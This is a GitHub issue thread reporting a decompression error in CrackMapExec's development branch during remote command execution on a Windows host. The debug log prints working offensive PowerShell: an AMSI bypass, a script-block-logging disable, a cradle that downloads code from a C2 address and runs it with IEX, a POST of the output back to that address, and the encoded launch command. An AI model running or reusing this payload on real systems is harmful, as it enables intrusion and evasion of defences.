### ISSUE TITLE
Error with-x "command" in dev branch

### ISSUE THREAD

**Issue by rbrown256** [byt3bl33d3r/CrackMapExec#265]
## Steps to reproduce

1. Run cme to try and execute a command on a "pwn'd" server
2. Error "Error -5 while decompressing data: incomplete or truncated stream" is received

## Command string used

$ cme --verbose smb 192.168.201.102 -u administrator -p October182 -x whoami

## CME Version (cme --version)

$ cme --version
4.1.0dev - ҪФԠЯДDЄ ԐDЇҐЇФЍ

## OS
Fedora 28

## Target OS
Windows 10

## Detailed issue explanation

$ cme --verbose smb 192.168.201.102 -u administrator -p October182 -x whoami
DEBUG Passed args:
{'c2_method': 'https',
 'content': False,
 'cred_id': [],
 'darrell': False,
 'dcs': False,
 'depth': None,
 'disks': False,
 'domain': None,
 'exclude_dirs': '',
 'exec_method': 'wmiexec',
 'execute': 'whoami',
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': None,
 'module_options': [],
 'no_output': False,
 'ntds': None,
 'only_files': False,
 'pass_pol': False,
 'password': ['October182'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.201.102'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['administrator'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
SMB         192.168.201.102 445    zzz-1WIN10       [*] Windows 10 Pro N 14393 x64 (name:zzz-1WIN10) (domain:MACFARLANE) (signing:False) (SMBv1:True)
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode.
Download it from https://www.dlitz.net/software/pycrypto
DEBUG add_credential(credtype=plaintext, domain=MACFARLANE, username=administrator, password=October182, groupid=None, pillaged_from=None) => None
SMB         192.168.201.102 445    zzz-1WIN10       [+] MACFARLANE\administrator:October182 (Pwn3d!)
DEBUG Calling execute()
DEBUG Attempting to execute command using https c2
DEBUG Generated PS payload:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
try{
    $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automat...

...g', 0)
        $GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
    } else {
        [ScriptBlock]."GetFie`ld"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
    }
}catch{}
whoami 

DEBUG Built PS command:
 
function Invoke-Compress
{
    [CmdletBinding()] Param (
        [Parameter(Mandatory = $True)]
        [string]
        $Data
    )

    $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Data)
    $CompressedStream = New-Object IO.MemoryStream
    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
    $DeflateStream.Dispose()
    $CompressedScriptBytes = $CompressedStream.ToArray()
    $CompressedStream.Dispose()
    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)

    return $EncodedCompressedScript
}

function Invoke-Decompress
{
    [CmdletBinding()] Param (
        [Parameter(Mandatory = $True)]
        [string]
        $Data
    )

    $B64Data = [IO.MemoryStream][Convert]::FromBase64String($Data.Trim())
    $Deflated = New-Object IO.Compression.DeflateStream($B64Data, [IO.Compression.CompressionMode]::Decompress)
    $Stream = New-Object IO.StreamReader($Deflated, [Text.Encoding]::ASCII)

    return $Stream.ReadToEnd()
}

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $payload = (New-Object Net.WebClient).DownloadString('https://192.168.201.100:443/uKwVJtvE'); $out = Invoke-Compress -Data (IEX (Invoke-Decompress -Data $payload) | Out-String);$request = [System.Net.WebRequest]::Create('https://192.168.201.100:443/OrvbsXAF'); $request.Method = 'POST'; $request.ContentType = 'application/x-www-form-urlencoded'; $bytes = [System.Text.Encoding]::ASCII.GetBytes($out); $request.ContentLength = $bytes.Length; $requestStream = $request.GetRequestStream(); $requestStream.Write($bytes, 0, $bytes.Length); $requestStream.Close(); $request.GetResponse() 

DEBUG Executing command via wmiexec exec method
DEBUG  * Running on https://0.0.0.0:443/ (Press CTRL+C to quit)
DEBUG Target system is 192.168.201.102 and isFDQN is False
DEBUG StringBinding: \\\\zzz-1WIN10[\\PIPE\\atsvc]
DEBUG StringBinding: zzz-1WIN10[1539]
DEBUG StringBinding: 169.254.27.71[1539]
DEBUG StringBinding: 192.168.201.102[1539]
DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.201.102[1539]
DEBUG Command to execute: powershell.exe -noni -nop -w 1 -enc ZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBDAG8AbQBwAHIAZQBzAHMACgB7AAoAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AIABQAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAFQAcgB1AGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAKACAAIAAgACAAIAAgACAAIAAkAEQAYQB0AGEACgAgACAAIAAgACkACgAgACAAIAAgACQAUwBjAHIAaQBwAHQAQgB5AHQAZQBzACAAPQAgACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABEAGEAdABhACkACgAgACAAIAAgACQAQwBvAG0AcAByAGUAcwBzAGUAZABTAHQAcgBlAGEAbQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0ACgAgACAAIAAgACQARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgACgAJABDAG8AbQBwAHIAZQBzAHMAZQBkAFMAdAByAGUAYQBtACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAkAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAFMAYwByAGkAcAB0AEIAeQB0AGUAcwAsACAAMAAsACAAJABTAGMAcgBpAHAAdABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAIAAgACAAIAAkAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0ALgBEAGkAcwBwAG8AcwBlACgAKQAKACAAIAAgACAAJABDAG8AbQBwAHIAZQBzAHMAZQBkAFMAYwByAGkAcAB0AEIAeQB0AGUAcwAgAD0AIAAkAEMAbwBtAHAAcgBlAHMAcwBlAGQAUwB0AHIAZQBhAG0ALgBUAG8AQQByAHIAYQB5ACgAKQAKACAAIAAgACAAJABDAG8AbQBwAHIAZQBzAHMAZQBkAFMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgACQARQBuAGMAbwBkAGUAZABDAG8AbQBwAHIAZQBzAHMAZQBkAFMAYwByAGkAcAB0ACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEMAbwBtAHAAcgBlAHMAcwBlAGQAUwBjAHIAaQBwAHQAQgB5AHQAZQBzACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABFAG4AYwBvAGQAZQBkAEMAbwBtAHAAcgBlAHMAcwBlAGQAUwBjAHIAaQBwAHQACgB9AAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBEAGUAYwBvAG0AcAByAGUAcwBzAAoAewAKACAAIAAgACAAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdACAAUABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJABUAHIAdQBlACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0ACgAgACAAIAAgACAAIAAgACAAJABEAGEAdABhAAoAIAAgACAAIAApAAoAIAAgACAAIAAkAEIANgA0AEQAYQB0AGEAIAA9ACAAWwBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQBdAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABEAGEAdABhAC4AVAByAGkAbQAoACkAKQAKACAAIAAgACAAJABEAGUAZgBsAGEAdABlAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAkAEIANgA0AEQAYQB0AGEALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAkAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQARABlAGYAbABhAHQAZQBkACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKAH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACAAJABwAGEAeQBsAG8AYQBkACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvADEAOQAyAC4AMQA2ADgALgAyADAAMQAuADEAMAAwADoANAA0ADMALwB1AEsAdwBWAEoAdAB2AEUAJwApADsAIAAkAG8AdQB0ACAAPQAgAEkAbgB2AG8AawBlAC0AQwBvAG0AcAByAGUAcwBzACAALQBEAGEAdABhACAAKABJAEUAWAAgACgASQBuAHYAbwBrAGUALQBEAGUAYwBvAG0AcAByAGUAcwBzACAALQBEAGEAdABhACAAJABwAGEAeQBsAG8AYQBkACkAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJAByAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAwADEALgAxADAAMAA6ADQANAAzAC8ATwByAHYAYgBzAFgAQQBGACcAKQA7ACAAJAByAGUAcQB1AGUAcwB0AC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAgACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAgACQAYgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQA7ACAAJAByAGUAcQB1AGUAcwB0AC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAcgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAOwAgACQAcgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAgACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA
DEBUG 192.168.201.102 - - [18/Aug/2018 20:07:54] "GET /uKwVJtvE HTTP/1.1" 200 -
[2018-08-18 20:08:02,191] ERROR in app: Exception on /OrvbsXAF [POST]
Traceback (most recent call last):
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/flask/app.py", line 1982, in wsgi_app
    response = self.full_dispatch_request()
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/flask/app.py", line 1614, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/flask/app.py", line 1517, in handle_user_exception
    reraise(exc_type, exc_value, tb)
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/flask/app.py", line 1612, in full_dispatch_request
    rv = self.dispatch_request()
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/flask/app.py", line 1598, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/crackmapexec-4.1.0.dev0-py2.7.egg/cme/c2/https.py", line 44, in payload_output
    self.output = ps_decode_and_inflate(request.data)
  File "/root/.local/share/virtualenvs/CrackMapExec-sovWza3b/lib/python2.7/site-packages/crackmapexec-4.1.0.dev0-py2.7.egg/cme/helpers/powershell.py", line 17, in ps_decode_and_inflate
    return zlib.decompress(decoded_data, -15)
error: Error -5 while decompressing data: incomplete or truncated stream
DEBUG 192.168.201.102 - - [18/Aug/2018 20:08:02] "POST /OrvbsXAF HTTP/1.1" 500 -

**Comment by byt3bl33d3r** [comment]
@rbrown256 thanks for the report. I'll take a look. There are still a **LOT** of kinks to work out in the dev branch since the entire C2 system has been overhauled.

**Comment by rbrown256** [comment]
No problem. I rolled back to the commit before the C2 system was overhauled, and I can confirm that it works fine.

**Comment by mpgn** [comment]
We are in v5 now and i don't think dev branch is relevant anymore :)
